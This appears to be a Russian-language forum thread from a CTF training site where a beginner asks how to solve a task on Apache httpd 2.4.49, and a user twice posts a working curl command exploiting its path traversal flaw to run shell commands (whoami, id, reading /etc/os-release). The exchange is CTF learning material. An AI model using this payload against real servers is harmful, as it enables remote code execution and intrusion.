Codeby Games Таск Админ Художник?

Jacob Guitarrero

Jacob Guitarrero

New member
25.11.2023
4
0
BIT
4
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
 
Сортировать по дате Сортировать по голосам
Exited3n

Exited3n

Red Team
10.05.2022
760
259
BIT
764
Jacob Guitarrero сказал(а):
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
Нажмите, чтобы раскрыть...
CVEшку не заюзать ?

Bash: 
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
 
За 0 Против
Jacob Guitarrero

Jacob Guitarrero

New member
25.11.2023
4
0
BIT
4
Exited3n сказал(а):
CVEшку не заюзать ?

Bash: 
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
Нажмите, чтобы раскрыть...
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
 
За 0 Против
Exited3n

Exited3n

Red Team
10.05.2022
760
259
BIT
764
Jacob Guitarrero сказал(а):
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
Нажмите, чтобы раскрыть...
Честно сказать даже не знаю что посоветовать.
Основы изучи, прям с азов рекомендую начать.
Начни с того что забей в поисковик - curl и почитай про данный инструмент, что делает, как запускается и т.д.
 
За 0 Против
GoBL1n

GoBL1n

Grey Team
04.08.2016
502
131
BIT
285
Jacob Guitarrero сказал(а):
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
Нажмите, чтобы раскрыть...
судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
 
За 0 Против
Jacob Guitarrero

Jacob Guitarrero

New member
25.11.2023
4
0
BIT
4
GoBL1n сказал(а):
судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
Нажмите, чтобы раскрыть...
самое собой изучать его, но этого не достаточно для решения данной задачи
 
За 0 Против
Exited3n

Exited3n

Red Team
10.05.2022
760
259
BIT
764
Jacob Guitarrero сказал(а):
самое собой изучать его, но этого не достаточно для решения данной задачи
Нажмите, чтобы раскрыть...
Серьезно ? curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'

И так, считаем утилиты - curl, echo, whoami, id, cat
Целых 5 штук! Причем база базой.
 
  • Нравится
Реакции: GoBL1n
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ